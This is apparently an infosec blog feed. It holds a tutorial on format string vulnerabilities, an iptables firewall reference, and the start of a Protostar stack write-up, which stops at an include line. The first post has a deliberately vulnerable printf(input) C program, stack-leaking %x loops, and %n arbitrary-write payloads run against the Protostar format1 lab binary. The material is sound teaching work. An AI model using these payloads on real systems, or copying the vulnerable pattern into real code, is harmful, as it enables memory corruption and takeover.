Jekyll2017-11-17T08:44:49+00:00https://kevinalmansa.github.io/InfoSec BlogArticles on a range of InfoSec topicsKevin Almansakevin.almansa@gmail.comIntroduction to Format Strings2017-08-07T00:00:00+00:002017-08-07T00:00:00+00:00https://kevinalmansa.github.io/application%20security/Format-Strings<p>This post will be a simple introduction to the classic format string
vulnerability. I will guide you through the basics of how format string
vulnerabilities are exploited with practical examples.</p>
<p><em>Disclaimer</em>: This post assumes very basic knowledge of assembly (how the ESP and
EBP are used for managing stack frames, as well as calling conventions), some
prior knowledge of the C programming language, and basic shell scripting.</p>
<p><code class="highlighter-rouge">printf()</code> and it’s family of functions are amongst the most used in the C
language. They make outputting data, either to a buffer, file, or stream
trivial. The printf definition is as follows:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="n">printf</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">format</span><span class="p">,</span> <span class="p">...);</span>
</code></pre></div></div>
<p><code class="highlighter-rouge">printf()</code> leverages <em>varargs</em> allowing for a variable number of arguments
to be passed. It knows how much data and how to format it through a specially
crafted string known as a format string (<code class="highlighter-rouge">const char *format</code> above). A
major vulnerability arises if the user can control this format string.</p>
<p>This post will first briefly go over a few key <code class="highlighter-rouge">printf()</code> format string
options, although it does assume the reader has used the C library
<code class="highlighter-rouge">printf()</code> before. We will then examine how memory can be read from the
stack by exploiting such a vulnerability. Finally, we’ll demonstrate how format
strings can be leveraged for arbitrary writes to memory.</p>
<h2 id="important-format-string-options">Important Format String Options</h2>
<p>Let’s begin by detailing the format of format string placeholders:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>%[parameter][flags][width][.precision][length]type
</code></pre></div></div>
<ul>
<li><code class="highlighter-rouge">[parameter]</code>: direct parameter access; Specifies the parameter to use for
input</li>
<li><code class="highlighter-rouge">[flags]</code> : the main one is <code class="highlighter-rouge">0</code> which, when used with width, prepends
0s</li>
<li><code class="highlighter-rouge">[width]</code>: width modifier; the minimum number of characters to output</li>
<li><code class="highlighter-rouge">[.precision]</code>: the maximum number of characters to output</li>
<li><code class="highlighter-rouge">[length]</code>: length modifier. Allows conversion of output to char, short,
int, etc.</li>
<li><code class="highlighter-rouge">type</code>: how to format the argument for output. For example %d expects an
integer as an argument, and outputs a number.</li>
</ul>
<p>Note that all of the options in <code class="highlighter-rouge">[]</code> are optional, and often referred to as
modifiers. <code class="highlighter-rouge">type</code> is not optional.</p>
<p>The key format string conversion <code class="highlighter-rouge">type</code> are the following:</p>
<table>
<thead>
<tr>
<th style="text-align: left">Type</th>
<th style="text-align: left">Input</th>
<th style="text-align: left">Output</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: left">%x</td>
<td style="text-align: left">unsigned integer</td>
<td style="text-align: left">Hexadecimal value</td>
</tr>
<tr>
<td style="text-align: left">%s</td>
<td style="text-align: left">pointer to an array of char</td>
<td style="text-align: left">String</td>
</tr>
<tr>
<td style="text-align: left">%n</td>
<td style="text-align: left">pointer to integer</td>
<td style="text-align: left">Number of bytes written so far</td>
</tr>
<tr>
<td style="text-align: left">%p</td>
<td style="text-align: left">pointer (void *)</td>
<td style="text-align: left">The value of the pointer (Not de-referenced)</td>
</tr>
</tbody>
</table>
<p>The key modifiers are the following:</p>
<table>
<thead>
<tr>
<th style="text-align: left">Modifier</th>
<th style="text-align: left">Description</th>
<th style="text-align: left">Example</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: left">i$</td>
<td style="text-align: left">Direct parameter access; Specifies the parameter to use for input</td>
<td style="text-align: left"><code class="highlighter-rouge">%2$x</code> : hex value of second parameter</td>
</tr>
<tr>
<td style="text-align: left">%ix</td>
<td style="text-align: left">Width modifier. Specifies the minimum width of the output.</td>
<td style="text-align: left"><code class="highlighter-rouge">%8x</code>: Hex value taking up 8 columns</td>
</tr>
<tr>
<td style="text-align: left">%hh</td>
<td style="text-align: left">Length modifier. Specifies that length is sizeof(char)</td>
<td style="text-align: left"><code class="highlighter-rouge">%hhn</code>: Writes 1 byte to target pointer</td>
</tr>
<tr>
<td style="text-align: left">%h</td>
<td style="text-align: left">Length modifier. Specifies that length is sizeof(short)</td>
<td style="text-align: left"><code class="highlighter-rouge">%hn</code>: Writes 2 bytes (in 32 bit System) to target pointer</td>
</tr>
</tbody>
</table>
<p>If you do not fully understand all of the above, I highly suggest playing around
with them using a simple C program. I personally found they were easier to grasp
through practice.</p>
<h2 id="reading-memory">Reading Memory</h2>
<p>Alright, with the above options listed as a reference, let’s now look at an
example of a format string vulnerability:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdlib.h>
#include <stdio.h>
</span>
<span class="kt">void</span> <span class="nf">vulnerable</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">input</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">volatile</span> <span class="kt">int</span> <span class="n">value</span> <span class="o">=</span> <span class="mh">0x45454545</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="n">input</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">ac</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">av</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">volatile</span> <span class="kt">int</span> <span class="n">value</span> <span class="o">=</span> <span class="mi">42</span><span class="p">;</span>
<span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
<span class="n">fgets</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buffer</span><span class="p">),</span> <span class="n">stdin</span><span class="p">);</span>
<span class="n">vulnerable</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>In the above example, we can see the program asks the user for input, and then
displays the input:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@vulnerable:/tmp<span class="nv">$ </span>./fmt-b
<span class="nb">test
test</span>
</code></pre></div></div>
<p>The issue is, the input is passed directly to the format string. This is a text
book example of a format string vulnerability. Let’s see what happens if we
enter the string <code class="highlighter-rouge">%x.%x.%x.%x</code>.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@protostar:/tmp<span class="nv">$ </span>./fmt-b
%x.%x.%x.%x
bffff7ac.3f.a.1
</code></pre></div></div>
<p>So what’s going on here? Why did it output data if no data was passed via
varargs?</p>
<p>Well, in the format string we told it to expect 4 integers, and that we would
like them to be output in hexadecimal. Thus, it took the 4 integers from the
location in which they should be located: the stack.</p>
<p>Here we examined 16 bytes of the stack. Specifically, values located at ESP,
ESP+4, ESP+8, ESP+12 at that given time.</p>
<p>Let’s write a small script to further visualise this. We’ll make use of direct
parameter access to display each byte one at a time (ESP, ESP+4, ESP+8, …).
We’ll begin our input with four A’s (hex value 0x41) so we can easily identify
our format buffer on the stack.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@vulnerable:/tmp<span class="nv">$ </span><span class="k">for </span>i <span class="k">in</span> <span class="o">{</span>1..35<span class="o">}</span><span class="p">;</span> <span class="k">do </span><span class="nb">echo</span> <span class="s2">"AAAA."</span> <span class="s2">"%</span><span class="nv">$i</span><span class="se">\$</span><span class="s2">x"</span> | ./fmt-b<span class="p">;</span> <span class="k">done
</span>AAAA.bffff7ac
AAAA.3f
AAAA.a
AAAA.1
AAAA.0
AAAA.bffff7ac
AAAA.45454545
AAAA.0
AAAA.0
AAAA.bffff7f8
AAAA.8048478
AAAA.bffff7ac
AAAA.40
AAAA.b7fd8420
AAAA.b7f0186e
AAAA.b7fd7ff4
AAAA.b7ec6165
AAAA.bffff7b8
AAAA.41414141
AAAA.3032252e
AAAA.a7824
AAAA.bffff7c8
AAAA.8048314
AAAA.b7ff1040
AAAA.804962c
AAAA.bffff7f8
AAAA.80484a9
AAAA.b7fd8304
AAAA.b7fd7ff4
AAAA.8048490
AAAA.bffff7f8
AAAA.b7ec6365
AAAA.b7ff1040
AAAA.804849bprotostar
AAAA.2a
</code></pre></div></div>
<p>As we can see, we’re moving up the stack (from lower memory to higher memory),
and we eventually hit the parameter we passed to printf (the 19th line:
AAAA.41414141). This means it takes 76 bytes to reach our actual format string
from where printf is processing it.</p>
<p>Let’s reorient this from higher memory to lower memory, and examine what is going
on exactly:</p>
<p><img src="/assets/images/format-strings/read-stack.png" alt="Format-Stack" /></p>
<p>As we can see, the first line of our output is <strong>0x2a</strong>. This is equal to 42.
It’s the variable <code class="highlighter-rouge">value</code> in <code class="highlighter-rouge">main</code>.</p>
<p>We can see in green the start of our user input; the actual format string.
Because we started it with with four ‘A’s it is easy to spot; ASCII ‘A’ is equal
to 0x41, thus the byte is equal to <strong>0x41414141</strong>.</p>
<p>In red we can see the value <strong>0x8048478</strong>. Upon examination using GDB we can find
that this is the return address for <code class="highlighter-rouge">vulnerable</code>.</p>
<p>Finally, in blue at the bottom, we see the value of vulnerable’s local variable
<code class="highlighter-rouge">value</code> which I placed to help identify what values in the stack correspond
to what.</p>
<p>So as we can see, by controlling the format string of printf, we are able to
analyse the stack, leaking all of it’s contents including pointers to code.
With a leaked pointer, we defeat ASLR, but information on that will be for
another time :) .</p>
<h2 id="arbitrary-writes">Arbitrary Writes</h2>
<p>For this section, I’ll simply explain the theory behind how an arbitrary write
can be achieved by exploiting a format string vulnerability. I’ll demonstrate
with a basic example; the Format1 challenge from Protostar. My next post will
be a full write-up of the Protostar format challenges, which will show more
advanced usages of the techniques shown here.</p>
<p>If we look back to the format conversion specifiers I listed above, we’ll notice
one that allows for writing to a pointer: <code class="highlighter-rouge">%n</code>. Now the question is, how
do we control the pointer it uses for writing a value?</p>
<p>By using direct parameter access.</p>
<p>Just before we saw how we can read the stack’s memory by exploiting a format
string vulnerability. We also noticed that our use input (the format string) is
accessible.</p>
<p>Well, what if we started this format string with an address rather than four
‘A’s? We should then be able to use the direct parameter access modifier to
specify that this address we entered is the pointer we want to use!</p>
<p>Let’s take the example <em>Format1</em> from Protostar which can be found here:
<a href="https://exploit-exercises.com/protostar/format1/">Format1</a></p>
<p>The program simply checks if a global variable has been modified. All we have to
do is find the address of that variable, find the parameter offset of our format
string in memory (as we’ve done before), and us <code class="highlighter-rouge">%n</code> to modify it’s value.</p>
<p>To obtain the address of the global:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@protostar:/opt/protostar/bin<span class="nv">$ </span>objdump <span class="nt">-t</span> format1 | <span class="nb">grep</span> <span class="s2">"target"</span>
08049638 g O .bss 00000004 target
</code></pre></div></div>
<p>The address is <strong>0x08049638</strong>.</p>
<p>We’ll calculate the offset the same way we’ve done before; using a small bash
script:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@protostar:/opt/protostar/bin<span class="nv">$ </span><span class="k">for </span>i <span class="k">in</span> <span class="o">{</span>1..200<span class="o">}</span><span class="p">;</span> <span class="k">do</span> ./format1 <span class="s2">"AAAAAAAA.%</span><span class="nv">$i</span><span class="se">\$</span><span class="s2">x"</span> | <span class="nb">grep</span> <span class="s2">"41414141"</span><span class="p">;</span> <span class="k">if</span> <span class="o">((</span> <span class="nv">$?</span> <span class="o">==</span> 0 <span class="o">))</span><span class="p">;</span> <span class="k">then </span><span class="nb">echo</span> <span class="s2">"Offset: </span><span class="nv">$i</span><span class="s2">"</span><span class="p">;</span> <span class="k">fi done
</span>AAAAAAAA.41414141
Offset: 130
</code></pre></div></div>
<blockquote>
<p>Note: we used eight ‘A’s due to potential padding issues. We may have to account
for padding in the exploit too.</p>
</blockquote>
<p>And now our exploit:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@protostar:/opt/protostar/bin<span class="nv">$ </span>./format1 <span class="k">$(</span>python <span class="nt">-c</span> <span class="s1">'print "\x38\x96\x04\x08" + "PPPP" + "%130$n"'</span><span class="k">)</span>
8�PPPPyou have modified the target :<span class="o">)</span>
</code></pre></div></div>
<blockquote>
<p>Note: the ‘P’s are for padding.</p>
</blockquote>
<p>As we can see, we have successfully modified the global variables address
proving successful arbitrary writes.</p>
<p>Now, <code class="highlighter-rouge">%n</code> writes the total number of characters written so far to the
pointer. We can increase the number written by using length specifiers. For
example, if we wanted to write the value 32 to <code class="highlighter-rouge">target</code> in format1:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@protostar:/opt/protostar/bin<span class="nv">$ </span>./format1 <span class="k">$(</span>python <span class="nt">-c</span> <span class="s1">'print "\x38\x96\x04\x08" + "" + "%28x" + "%130$n"'</span><span class="k">)</span>
8� 804960cyou have modified the target :<span class="o">)</span>
</code></pre></div></div>
<p>Now let’s break down what’s happening here by listing what’s written:</p>
<ul>
<li>address: 4 bytes</li>
<li>padding: 0 bytes. No longer used due to the length specifier bellow.</li>
<li>length specifier: 28 bytes. We don’t really care about it’s value, just that
it takes up 28 bytes.</li>
<li>the conversion specifier telling us to write at the 130th parameter.</li>
</ul>
<p>If we add everything up, we’ll notice it adds up to 32! The value the conversion
specifier will then write to our address.</p>
<p>Now, why is the padding no longer needed? Well simply, this moved the stack in
such a way that we no longer needed it. Padding can be a pain when exploiting
format strings.</p>
<h2 id="conclusion">Conclusion</h2>
<p>Format Strings are used by the printf family of functions to indicate what data
the function should expect, and how to format it. It is considered a major
vulnerability if the user can control this string.</p>
<p>In this post we presented basic examples of how format string vulnerabilities
can be leveraged to achieve arbitrary reads and writes to memory. For more
examples, my next post will be a write-up of the Protostar format string
challenges.</p>Kevin Almansakevin.almansa@gmail.comThis post aims to serve as a visual and simple introduction to format string vulnerabilities.IPTables2017-08-02T00:00:00+00:002017-08-02T00:00:00+00:00https://kevinalmansa.github.io/network%20security/IPTables<p>In this post we’ll explore a bit the basics of the Linux Firewall, IPTables. I’m
going to try and structure this post so that is can serve as an introduction to
IPTables, but also as a reference to quickly look up forgotten commands.</p>
<p>This post will begin by introducing IPTables, detailing the concepts behind it
and how it works. We’ll then move towards configuring it with the command line
interface.</p>
<h2 id="what-is-iptables">What is IPTables</h2>
<p>As described in the IPTables manual, “iptables and ip6tables are used to set up,
maintain, and inspect the tables of IPv4 and IPv6 packet filter rules in the
Linux kernel.”. In other words, its a command line utility that allows a system
administrator to interact with the kernel’s built-in firewall (the Netfilter
Project).</p>
<p>IPTables with the Netfilter Project filters traffic from the network layer up to
the application layer in the OSI Model. This is important to note because
protocols such as ARP which reside in the Data-Link layer will not be filtered.
That being said, IPTables CAN filter on Data-Link MAC address, but only if the
kernel is compiled accordingly (default since Linux kernel 2.6).</p>
<h3 id="tables">Tables</h3>
<p>IPTables is used to configure the five Linux kernel tables which construct
the functionality:</p>
<ol>
<li><code class="highlighter-rouge">filter</code> the default table. This holds all actions typical of a firewall.</li>
<li><code class="highlighter-rouge">nat</code> Network Address Translation (port forwarding).</li>
<li><code class="highlighter-rouge">mangle</code> used for packet alterations.</li>
<li><code class="highlighter-rouge">raw</code> used for configuring packets so that they are exempt from connection
tracking.</li>
<li><code class="highlighter-rouge">security</code> used for <em>Mandatory Access Control</em> networking rules (ex.
SELinux).</li>
</ol>
<p>The most commonly used tables are <strong>filter</strong> and <strong>nat</strong>.</p>
<h3 id="chains">Chains</h3>
<p>Tables themselves consist of <em>Chains</em>; lists of rules followed in order. Each
table has a default set of chains, with the chains for <code class="highlighter-rouge">filter</code> and <code class="highlighter-rouge">nat</code> being:</p>
<table>
<thead>
<tr>
<th style="text-align: left">Table</th>
<th style="text-align: left">Chains</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: left">filter</td>
<td style="text-align: left">INPUT, OUTPUT, FORWARD</td>
</tr>
<tr>
<td style="text-align: left">nat</td>
<td style="text-align: left">PREROUTING, POSTROUTING, OUTPUT</td>
</tr>
</tbody>
</table>
<p>For the others, please consult the manual.</p>
<p>An overview of the packet flow through these two tables and their respective
chains can be seen with the image bellow.</p>
<p><img src="/assets/images/iptables/iptables.jpg" alt="iptables flow" />
<em>Figure 1. from Linux Firewalls (Michael Rash, 2007)</em></p>
<p>User-defined chains may also be created to group a common set of rules.</p>
<p>By default, the chains do not contain any rules, but they <em>do</em> have a default
policy which applies at the end of a chain ONLY. <strong>User defined chains can not</strong>
<strong>have a default policy</strong>. The default policy can be either <code class="highlighter-rouge">ACCEPT</code> or <code class="highlighter-rouge">DROP</code>
depending on whether you want a <em>black-list</em> or <em>white-list</em> approach to
filtering.</p>
<h3 id="rules">Rules</h3>
<p>Finally, we have rules. Rules filter the packets by specifying one or multiple
<em>matches</em> and one <em>target</em> (the action to take when a packet matches all
conditions).</p>
<h4 id="matches">Matches</h4>
<p>A <em>match</em> is simply a set of conditions that must be met by a packet for it to
be processed with an action taken. Examples in general firewalls are
source/destination IPs, ports, interfaces, etc. IPTables is no different.</p>
<p>Common matches in IPTables include:</p>
<table>
<thead>
<tr>
<th style="text-align: left">Match</th>
<th style="text-align: left">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: left">–source (-s)</td>
<td style="text-align: left">Matches on a source IP or network</td>
</tr>
<tr>
<td style="text-align: left">–destination (-d)</td>
<td style="text-align: left">Matches on a destination IP or network</td>
</tr>
<tr>
<td style="text-align: left">–protocol (-p)</td>
<td style="text-align: left">Protocol to match. ex. all, tcp, udp, icmp…</td>
</tr>
<tr>
<td style="text-align: left">–in-interface (-i)</td>
<td style="text-align: left">Input interface (ex: eth0)</td>
</tr>
<tr>
<td style="text-align: left">–out-interface (-o)</td>
<td style="text-align: left">Output interface</td>
</tr>
<tr>
<td style="text-align: left">–dport</td>
<td style="text-align: left">Destination port</td>
</tr>
<tr>
<td style="text-align: left">–sport</td>
<td style="text-align: left">Source port</td>
</tr>
<tr>
<td style="text-align: left">–state</td>
<td style="text-align: left">Extension. Match on a set of connection states: INVALID, ESTABLISHED, NEW, RELATED, UNTRACKED.</td>
</tr>
<tr>
<td style="text-align: left">–string</td>
<td style="text-align: left">Extension. Match on a sequence of application layer data bytes</td>
</tr>
<tr>
<td style="text-align: left">–comment</td>
<td style="text-align: left">Extension. Allows you to add comments to rules</td>
</tr>
</tbody>
</table>
<h4 id="targets">Targets</h4>
<p>Targets, the action taken when a packet matches all conditions, are either
built-in, or provided via a <em>target extension</em>.</p>
<p>Although a target is typically an action, it can also be a <em>user-defined</em>
<em>chain</em>, which would then be used to continue processing.</p>
<p>The most common targets are:</p>
<table>
<thead>
<tr>
<th style="text-align: left">Target</th>
<th style="text-align: left">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: left">ACCEPT</td>
<td style="text-align: left">Allows the packet to continue through other tables.</td>
</tr>
<tr>
<td style="text-align: left">DROP</td>
<td style="text-align: left">Drops the packet. No further processing applied.</td>
</tr>
<tr>
<td style="text-align: left">QUEUE</td>
<td style="text-align: left"> </td>
</tr>
<tr>
<td style="text-align: left">RETURN</td>
<td style="text-align: left">Stop traversing this chain and resume at the next rule calling chain.</td>
</tr>
<tr>
<td style="text-align: left">LOG</td>
<td style="text-align: left">Extension. Logs the packet to syslog.</td>
</tr>
<tr>
<td style="text-align: left">REJECT</td>
<td style="text-align: left">Extension. Drops the packet and sends an appropriate response.</td>
</tr>
</tbody>
</table>
<p>Targets are specified using the <code class="highlighter-rouge">-j</code> or <code class="highlighter-rouge">--jump</code> option.</p>
<h3 id="summery">Summery</h3>
<p>IPTables is the standard Linux Firewall that operates from the Network Layer to
the Application Layer in the OSI Model. As seen throughout this section, rules
are made up of conditions, referred to as <em>matches</em>, and an action, referred to
as a <em>target</em>. Rules themselves are stored in lists, referred to as <em>chains</em>,
which are stored in one of the five <em>tables</em>. Default chains are invoked at
different aspects of the packet flow through the filtering system allowing for a
fine-grained control.</p>
<p>In the next section, we’ll look at interacting with IPTables through the command
line interface. We’ll demonstrate how to backup a configuration, administrate
rules and chains, as well as cover some of the more commonly used rules.</p>
<h2 id="iptables-command-line">IPTables Command Line</h2>
<p>This section will demonstrate essential and commonly used IPTables commands. It
is formatted in such a way that I hope it may be used as a reference as well.
Please note as well, the <code class="highlighter-rouge">iptables</code> command require root privileges.</p>
<p>An important note to keep in mind throughout this section: all <code class="highlighter-rouge">iptables</code>
commands default to the <code class="highlighter-rouge">filter</code> table. To specify another table, use the
<code class="highlighter-rouge">-t</code> option; <code class="highlighter-rouge">iptables -t nat</code>.</p>
<p>Also, before trying any of these commands, please bare in mind if you are not
locally on the machine and you DROP or REJECT network connections, you will be
kicked out of your session by the firewall.</p>
<p>Please do not forget to backup your configuration before modifying IPTables.</p>
<h3 id="iptables-configuration">IPTables Configuration</h3>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>iptables-save <span class="o">></span> /etc/iptables/iptables.rules <span class="c"># Save current configuration</span>
<span class="nv">$ </span>iptables-restore < /etc/iptables/iptables.rules <span class="c"># Restore configuration</span>
</code></pre></div></div>
<h3 id="list-current-rules">List current rules</h3>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>iptables <span class="nt">--list-rules</span>
<span class="nv">$ </span>iptables <span class="nt">-S</span> <span class="c"># same command as above</span>
</code></pre></div></div>
<p>or for more information:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>iptables <span class="nt">-nvL</span>
</code></pre></div></div>
<h3 id="show-line-numbers">Show Line Numbers</h3>
<p>Useful when editing rules.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">--line-numbers</span>
</code></pre></div></div>
<h3 id="set-default-policy">Set default policy</h3>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>iptables <span class="nt">-P</span> FORWARD DROP
</code></pre></div></div>
<p>Only use the above if you do not route packets.</p>
<h3 id="create-user-defined-chain">Create user defined chain</h3>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>iptables <span class="nt">-N</span> MY_NEW_CHAIN
</code></pre></div></div>
<h3 id="using-user-defined-chain">Using user defined chain</h3>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>iptables <span class="nt">-A</span> INPUT <span class="nt">-p</span> tcp <span class="nt">--dport</span> 80 <span class="nt">-j</span> MY_NEW_CHAIN <span class="nt">-m</span> comment <span class="nt">--comment</span> <span class="s2">"Use new chain to process http"</span>
</code></pre></div></div>
<p>also useful, retrieved via the Arch Wiki
<a href="https://wiki.archlinux.org/index.php/simple_stateful_firewall">Simple stateful firewall</a>:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>iptables <span class="nt">-A</span> INPUT <span class="nt">-m</span> conntrack <span class="nt">--ctstate</span> RELATED,ESTABLISHED <span class="nt">-j</span> ACCEPT
<span class="nv">$ </span>iptables <span class="nt">-A</span> INPUT <span class="nt">-p</span> udp <span class="nt">-m</span> conntrack <span class="nt">--ctstate</span> NEW <span class="nt">-j</span> UDP
<span class="nv">$ </span>iptables <span class="nt">-A</span> INPUT <span class="nt">-p</span> tcp <span class="nt">--syn</span> <span class="nt">-m</span> conntrack <span class="nt">--ctstate</span> NEW <span class="nt">-j</span> TCP
<span class="nv">$ </span>iptables <span class="nt">-A</span> INPUT <span class="nt">-p</span> udp <span class="nt">-j</span> REJECT <span class="nt">--reject-with</span> icmp-port-unreachable
<span class="nv">$ </span>iptables <span class="nt">-A</span> INPUT <span class="nt">-p</span> tcp <span class="nt">-j</span> REJECT <span class="nt">--reject-with</span> tcp-reset
</code></pre></div></div>
<p>The first rule allows all previously established or active connections. The next
two rules set the <em>target</em> to the user defined chain <em>UDP</em> and <em>TCP</em> upon a new
<em>UDP</em> or <em>TCP</em> packet. The last two then reject all other UDP and TCP
attempts to unopened ports.</p>
<p>This allows for TCP rules (such as opening ports, logging, etc) to be handled in
the user defined chain <em>TCP</em>, and UDP rules to be handled in the <em>UDP</em> chain.</p>
<h3 id="editing-rules">Editing Rules</h3>
<p>Rules can be appended (<code class="highlighter-rouge">-A</code>), inserted (<code class="highlighter-rouge">-I</code>) to a specific position,
replaced (<code class="highlighter-rouge">-R</code>) or deleted (<code class="highlighter-rouge">-D</code>).</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>iptables <span class="nt">-A</span> INPUT <span class="nt">-p</span> tcp <span class="nt">--dport</span> 22 <span class="nt">-j</span> REJECT <span class="nt">--reject-with</span> icmp-port-unreachable
</code></pre></div></div>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>iptables <span class="nt">-R</span> INPUT 1 <span class="nt">-p</span> tcp <span class="nt">--dport</span> 22 <span class="o">!</span> <span class="nt">-s</span> 10.0.0.85 <span class="nt">-j</span> REJECT <span class="nt">--reject-with</span> icmp-port-unreachable
<span class="c">## Replaces the first rule in INPUT. ! -s 10.0.0.85 means to allow 10.0.0.85</span>
<span class="c">## This rule does not scale well...thus let's add the rule bellow first!</span>
</code></pre></div></div>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>iptables <span class="nt">-I</span> INPUT <span class="nt">-p</span> tcp <span class="nt">--dport</span> 22 <span class="nt">-s</span> 10.0.0.85 <span class="nt">-j</span> ACCEPT <span class="nt">-m</span> comment <span class="nt">--comment</span> <span class="s2">"Friendly SSH connection"</span>
<span class="c">## Now let's replace the rule shown before!</span>
</code></pre></div></div>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>iptables <span class="nt">-R</span> INPUT 2 <span class="nt">-p</span> tcp <span class="nt">--dport</span> 22 <span class="nt">-j</span> REJECT <span class="nt">--reject-with</span> icmp-port-unreachable
</code></pre></div></div>
<h3 id="allow-local-data">Allow local data</h3>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>iptables <span class="nt">-A</span> INPUT <span class="nt">-i</span> lo <span class="nt">-p</span> all <span class="nt">-j</span> ACCEPT <span class="nt">-m</span> comment <span class="nt">--comment</span> <span class="s2">"Allow All Local Traffic"</span>
</code></pre></div></div>
<h3 id="allow-existing-connections">Allow existing connections</h3>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>iptables <span class="nt">-A</span> INPUT <span class="nt">-m</span> state <span class="nt">--state</span> ESTABLISHED,RELATED <span class="nt">-j</span> ACCEPT
</code></pre></div></div>
<p>or</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>iptables <span class="nt">-A</span> INPUT <span class="nt">-m</span> conntrack <span class="nt">--ctstate</span> RELATED,ESTABLISHED <span class="nt">-j</span> ACCEPT
</code></pre></div></div>
<h3 id="allow-ping">Allow ping</h3>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>iptables <span class="nt">-A</span> INPUT <span class="nt">-p</span> icmp <span class="nt">--icmp-type</span> echo-request <span class="nt">-j</span> ACCEPT
</code></pre></div></div>
<p>or</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>iptables <span class="nt">-A</span> INPUT <span class="nt">-p</span> icmp <span class="nt">--icmp-type</span> 8 <span class="nt">-m</span> conntrack <span class="nt">--ctstate</span> NEW <span class="nt">-j</span> ACCEPT
</code></pre></div></div>
<h3 id="safe-defaults">Safe Defaults</h3>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>iptables <span class="nt">-P</span> INPUT DROP
<span class="nv">$ </span>iptables <span class="nt">-P</span> FORWARD DROP
<span class="nv">$ </span>iptables <span class="nt">-P</span> OUTPUT ACCEPT
</code></pre></div></div>
<p><strong>NOTE:</strong> As previously mentioned, if you are not locally in front of the
machine, the above CAN disconnect your remote session and WILL require you to
locally modify it, or reboot the machine. <strong>TREAD CAREFULLY</strong>.</p>
<h3 id="drop-invalid-packets">Drop Invalid Packets</h3>
<p>This drops packets with invalid checksums, invalid headers, invalid ICMP, and
out of sequence packets.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>iptables <span class="nt">-A</span> INPUT <span class="nt">-m</span> conntrack <span class="nt">--ctstate</span> INVALID <span class="nt">-j</span> DROP
</code></pre></div></div>
<h3 id="more-examples">More Examples</h3>
<p>More examples can be found bellow:</p>
<p>https://linuxconfig.org/collection-of-basic-linux-firewall-iptables-rules
https://wiki.archlinux.org/index.php/simple_stateful_firewall</p>Kevin Almansakevin.almansa@gmail.comThis post is created to both introduce and serve as a reference to the Linux firewall IPTables.Protostar Stack Write-up2017-07-23T00:00:00+00:002017-07-23T00:00:00+00:00https://kevinalmansa.github.io/write-ups/Protostar-Stack-Write-up<p>This will be the first of many write-ups to come. I had the pleasure to play
with Exploit-Exercise’s Protostar challenge, focusing on exploitation techniques
including</p>
<ul>
<li>Stack Overflows</li>
<li>Format Strings</li>
<li>Heap Overflows</li>
<li>Sockets & Networking</li>
<li>Shellcoding</li>
</ul>
<p>This first part will cover my solutions to the Stack Overflow challenges.</p>
<h2 id="stack0">Stack0</h2>
<h3 id="description">Description:</h3>
<p>https://exploit-exercises.com/protostar/stack0/</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdlib.h>
